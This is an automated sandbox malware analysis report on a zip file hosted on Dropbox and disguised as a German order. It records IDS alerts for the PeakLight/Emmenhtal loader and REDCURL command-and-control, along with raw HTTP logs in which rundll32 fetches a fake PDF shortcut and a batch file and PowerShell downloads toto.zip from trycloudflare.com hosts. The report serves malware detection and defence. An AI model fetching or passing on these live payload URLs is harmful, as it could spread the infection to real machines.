Windows Analysis Report
https://dl.dropboxusercontent.com/scl/fi/kzw07ghqs05mfyhu8o3ey/BestellungVRG020002.zip?rlkey=27cmmjv86s5ygdnss2oa80i1o&st=86cnbbyp&dl=0

Overview

General Information

Sample URL:	https://dl.dropboxusercontent.com/scl/fi/kzw07ghqs05mfyhu8o3ey/BestellungVRG020002.zip?rlkey=27cmmjv86s5ygdnss2oa80i1o&st=86cnbbyp&dl=0
Analysis ID:	1541917
Infos:

Detection

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Sigma detected: rundll32 run dll from internet

Suricata IDS alerts for network traffic

Downloads suspicious files via Chrome

Opens network shares

Suspicious powershell command line found

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: PowerShell Web Download

Sigma detected: Usage Of Web Request Commands And Cmdlets

Stores files to the Windows start menu directory

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Signatures

Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.17:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.223.108.114:443 -> 192.168.2.17:58412 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:58413 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:58414 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:58415 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.73:443 -> 192.168.2.17:58416 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:58418 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.17:58419 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.73:443 -> 192.168.2.17:58421 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.73:443 -> 192.168.2.17:58426 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.209.166:443 -> 192.168.2.17:58428 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:58430 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:58435 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.231.132:443 -> 192.168.2.17:58442 version: TLS 1.2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2055990 - Severity 1 - ET MALWARE PeakLight/Emmenhtal Loader Payload Request : 192.168.2.17:58432 -> 104.16.230.132:443
Source: Network traffic	Suricata IDS: 2055990 - Severity 1 - ET MALWARE PeakLight/Emmenhtal Loader Payload Request : 192.168.2.17:58424 -> 104.16.230.132:443
Source: Network traffic	Suricata IDS: 2030697 - Severity 1 - ET MALWARE Suspected REDCURL CnC Activity M1 : 192.168.2.17:58435 -> 104.16.230.132:443
Source: Network traffic	Suricata IDS: 2055990 - Severity 1 - ET MALWARE PeakLight/Emmenhtal Loader Payload Request : 192.168.2.17:58430 -> 104.16.230.132:443
Source: Network traffic	Suricata IDS: 2030697 - Severity 1 - ET MALWARE Suspected REDCURL CnC Activity M1 : 192.168.2.17:58436 -> 104.16.230.132:443

Detected non-DNS traffic on DNS port

Source: global traffic

TCP traffic: 192.168.2.17:58411 -> 1.1.1.1:53

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /ab HTTP/1.1Host: evoke-windowsservices-tas.msedge.netCache-Control: no-store, no-cacheX-PHOTOS-CALLERID: 9NMPJ99VJBWVX-EVOKE-RING: X-WINNEXT-RING: PublicX-WINNEXT-TELEMETRYLEVEL: BasicX-WINNEXT-OSVERSION: 10.0.19045.0X-WINNEXT-APPVERSION: 1.23082.131.0X-WINNEXT-PLATFORM: DesktopX-WINNEXT-CANTAILOR: FalseX-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd}X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI=If-None-Match: 2056388360_-1434155563Accept-Encoding: gzip, deflate, br

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 173.223.108.114
Source: unknown	TCP traffic detected without corresponding DNS query: 173.223.108.114
Source: unknown	TCP traffic detected without corresponding DNS query: 173.223.108.114
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 173.223.108.114
Source: unknown	TCP traffic detected without corresponding DNS query: 173.223.108.114
Source: unknown	TCP traffic detected without corresponding DNS query: 173.223.108.114
Source: unknown	TCP traffic detected without corresponding DNS query: 173.223.108.114
Source: unknown	TCP traffic detected without corresponding DNS query: 173.223.108.114
Source: unknown	TCP traffic detected without corresponding DNS query: 173.223.108.114
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200

Source: global traffic	HTTP traffic detected: GET /scl/fi/kzw07ghqs05mfyhu8o3ey/BestellungVRG020002.zip?rlkey=27cmmjv86s5ygdnss2oa80i1o&st=86cnbbyp&dl=0 HTTP/1.1Host: dl.dropboxusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=+burwd2gSRS3DpE&MD=F+m3pX57 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /ab HTTP/1.1Host: evoke-windowsservices-tas.msedge.netCache-Control: no-store, no-cacheX-PHOTOS-CALLERID: 9NMPJ99VJBWVX-EVOKE-RING: X-WINNEXT-RING: PublicX-WINNEXT-TELEMETRYLEVEL: BasicX-WINNEXT-OSVERSION: 10.0.19045.0X-WINNEXT-APPVERSION: 1.23082.131.0X-WINNEXT-PLATFORM: DesktopX-WINNEXT-CANTAILOR: FalseX-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd}X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI=If-None-Match: 2056388360_-1434155563Accept-Encoding: gzip, deflate, br
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=+burwd2gSRS3DpE&MD=F+m3pX57 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /DE/bestellung-DKM00392pdf.lnk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045translate: fHost: theme-crack-emissions-perspectives.trycloudflare.com
Source: global traffic	HTTP traffic detected: GET /client/config?cc=CH&setlang=en-CH HTTP/1.1X-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateAccept-Encoding: gzip, deflateX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-UserAgeClass: UnknownX-BM-Market: CHX-BM-DateFormat: dd/MM/yyyyX-Device-OSSKU: 48X-BM-DTZ: -240X-DeviceID: 01000A41090080B6X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Search-TimeZone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard TimeX-BM-Theme: 000000;0078d7X-Search-RPSToken: t%3DEwDoAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAeTJB6GQoR3vFznZlEH0f2JYwWvPqjVxhhPZcNRxCuEa8rg2vF0%2B48tez2f%2B2ZaBCq2LMDmMhd2RqYDnZgQ%2BxO%2BCYYqrgaG4c9ODFtmn1shIOTEeSj6lTMoJ22RdI83MoMGqn7ZzTa5ywHlxMlUgzz2PTgBOTPK6FN1x%2Bv5aY%2BAqQlWGJQyhrvJR1ynwLYow4udbf%2Bt5XF7wdXy%2BdmAWA8AHlzXs8HZ6ZKCjmDTtNIwUvZVO1990xqukNh4hthSqVqWhtehTkACCLiRDzJvnWn/3MYPSxap3omIguycIVu3jnipHXN05qZW%2BP8aYQay9ddn2SzW6lkRXfea0OevD%2BHcQZgAAEGWEtZJPhf/IgR%2B72EZr4tiwAZOG/sn2HWBKXFYU4/oKI1Sqw9fYWGfbjkeosWd9hw%2BDC4hR/mGSyt%2B03As/9aXmz5YH6XTV0pNi30ZLy4ZFX/iIB4svD2kMWUxhDTTejlgjgnzHJacikhh42nA46f1fNg4CxR/FwhDYblDTPgAkStTho8biFQamjQOOvBRjEc1W0Gnh26rtIw2CwB3ErC0PwcshYCjpXxo/zwTAeJOFdpcjXUDVHe27g%2B71OkuzyGEG7NkTQhTSKy3zei5TSOQVZzbvAc2eXPbOBNFnqD0CeVP4Te2GEQrYq%2BUeWd/vW2xGbe90GiSV9N975/wF/o%2BhdMieHOegaLIw5mxhMVZJw6mXgAgytNOb39FhQu5ll6ZmFkne95amvgOTcr5AXKPLCIezgzqRipCHoD74VNfoyB4JPq/38Uhwgh2c4tMoXrF%2B8bijhGem%2BLq7QK9PSOkeTybpWOwYm2WKmqdjLUaNHD5LY3oCjVTsJT23SQ/SIeb8aJc6s9ZOUtL2uclqBs/dMYMA0Zlkz2xp1Qfcw01Hi1qGtrHubkawh59S1lXd3m7gxdmTnee0ZFBGL41cySdnFNoB%26p%3DX-Agent-DeviceId: 01000A41090080B6X-BM-CBT: 1729844189User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045X-Device-isOptin: falseAccept-language: en-GB, en, en-USX-Device-Touch: falseX-Device-ClientSession: 22FB18B5D25C449CA38B28C3BD9A9077X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIHost: www.bing.comConnection: Keep-AliveCookie: SRCHUID=V=2&GUID=C4EAB6C130004333A34B5668AE4E4D10&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=en; MUID=4590362BB5CF472B95BBEDB3112D4B7B; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
Source: global traffic	HTTP traffic detected: GET /tue.bat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045translate: fHost: theme-crack-emissions-perspectives.trycloudflare.com
Source: global traffic	HTTP traffic detected: GET /toto.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: retailer-indicators-resume-key.trycloudflare.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT

Source: global traffic	DNS traffic detected: DNS query: dl.dropboxusercontent.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: retailer-indicators-resume-key.trycloudflare.com
Source: global traffic	DNS traffic detected: DNS query: x1.i.lencr.org

Source: unknown

HTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 25 Oct 2024 08:16:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 8d80c3ed2f474677-DFWCF-Cache-Status: DYNAMICServer: cloudflare

Source: 77EC63BDA74BD0D0E0426DC8F80085060.34.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000024.00000002.2402487121.0000013E46D58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2402487121.0000013E46C18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000024.00000002.2355149096.0000013E36DC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000024.00000002.2355149096.0000013E38180000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://retailer-indicators-resume-key.trycloudflare.com
Source: powershell.exe, 00000024.00000002.2355149096.0000013E36BA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000024.00000002.2355149096.0000013E36DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2406744856.0000013E4EBF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 2D85F72862B55C4EADD9E66E06947F3D0.34.dr	String found in binary or memory: http://x1.i.lencr.org/
Source: powershell.exe, 00000024.00000002.2355149096.0000013E36BA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000024.00000002.2402487121.0000013E46C18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000024.00000002.2402487121.0000013E46C18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000024.00000002.2402487121.0000013E46C18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000024.00000002.2355149096.0000013E36DC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000024.00000002.2355149096.0000013E37D05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000024.00000002.2402487121.0000013E46D58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2402487121.0000013E46C18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000024.00000002.2355149096.0000013E37EEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://retailer-indicators-resume-key.trycloudfla
Source: powershell.exe, 00000024.00000002.2355149096.0000013E37EEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2355149096.0000013E36DC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://retailer-indicators-resume-key.trycloudflare.com
Source: powershell.exe, 00000024.00000002.2351437707.0000013E34B70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://retailer-indicators-resume-key.trycloudflare.com/toto.zip
Source: cmd.exe, 0000001E.00000003.2317191329.0000025D62B69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://retailer-indicators-resume-key.trycloudflare.com/toto.zip&
Source: powershell.exe, 00000024.00000002.2352815037.0000013E34C50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://retailer-indicators-resume-key.trycloudflare.com/toto.zip;
Source: cmd.exe, 0000001E.00000003.2317191329.0000025D62B49000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000003.2318311250.0000025D62B4F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.2350815549.0000025D62B4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://retailer-indicators-resume-key.trycloudflare.com/toto.zipO
Source: cmd.exe, 0000001E.00000003.2317191329.0000025D62B69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://retailer-indicators-resume-key.trycloudflare.com/toto.zipWindows##
Source: powershell.exe, 00000024.00000002.2352815037.0000013E34C50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://retailer-indicators-resume-key.trycloudflare.com/toto.zipX
Source: cmd.exe, 0000001E.00000003.2317191329.0000025D62B69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://retailer-indicators-resume-key.trycloudflare.com/toto.zipxit
Source: rundll32.exe, 00000016.00000002.1565812654.0000020B53770000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000018.00000002.1742704031.0000028904A5B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001F.00000002.1961788980.000002068657C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001F.00000002.1961788980.0000020686586000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/
Source: rundll32.exe, 00000016.00000002.1565812654.0000020B537CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/#
Source: rundll32.exe, 0000001F.00000002.1961788980.0000020686586000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/55theme-crack-emissions-perspectives.tr
Source: rundll32.exe, 00000011.00000002.1551843850.000001EC8FB50000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000002.1565812654.0000020B53770000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/C:
Source: rundll32.exe, 00000018.00000002.1742704031.00000289049E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnk
Source: rundll32.exe, 00000018.00000002.1742704031.00000289049E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnk:
Source: rundll32.exe, 00000018.00000002.1742704031.00000289049E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnkC:
Source: rundll32.exe, 00000018.00000002.1742704031.0000028904A3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnkL
Source: rundll32.exe, 00000018.00000002.1742704031.00000289049E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnkq
Source: rundll32.exe, 00000018.00000002.1742704031.00000289049E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnkrw
Source: rundll32.exe, 00000018.00000002.1742917977.0000028904C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnks=C:
Source: rundll32.exe, 00000011.00000002.1552005067.000001EC8FF00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/ESSOR_REVISION
Source: rundll32.exe, 00000016.00000002.1566077343.0000020B53A00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/ESSOR_REVISIONJ
Source: rundll32.exe, 00000016.00000002.1565812654.0000020B53778000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/OT
Source: rundll32.exe, 00000011.00000002.1551843850.000001EC8FB58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/ll
Source: rundll32.exe, 0000001F.00000002.1961788980.0000020686520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/tue.bat
Source: rundll32.exe, 0000001F.00000002.1961788980.0000020686528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/tue.bat4
Source: rundll32.exe, 0000001F.00000002.1961788980.0000020686520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/tue.batC:
Source: rundll32.exe, 0000001F.00000002.1962100847.0000020686810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/tue.batq

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 58436 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58413 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58418
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58417
Source: unknown	Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58419
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58414
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58413
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58416
Source: unknown	Network traffic detected: HTTP traffic on port 58423 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58415
Source: unknown	Network traffic detected: HTTP traffic on port 58426 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58442 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58421
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58420
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58423
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58422
Source: unknown	Network traffic detected: HTTP traffic on port 58439 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58416 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58433 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58412 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58428
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58425
Source: unknown	Network traffic detected: HTTP traffic on port 58422 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58424
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58427
Source: unknown	Network traffic detected: HTTP traffic on port 58425 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58426
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58432
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58431
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58434
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58433
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58430
Source: unknown	Network traffic detected: HTTP traffic on port 58415 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58419 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58432 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58439
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58436
Source: unknown	Network traffic detected: HTTP traffic on port 58421 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58435
Source: unknown	Network traffic detected: HTTP traffic on port 58428 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58437
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58442
Source: unknown	Network traffic detected: HTTP traffic on port 58418 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58431 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49680 -> 443
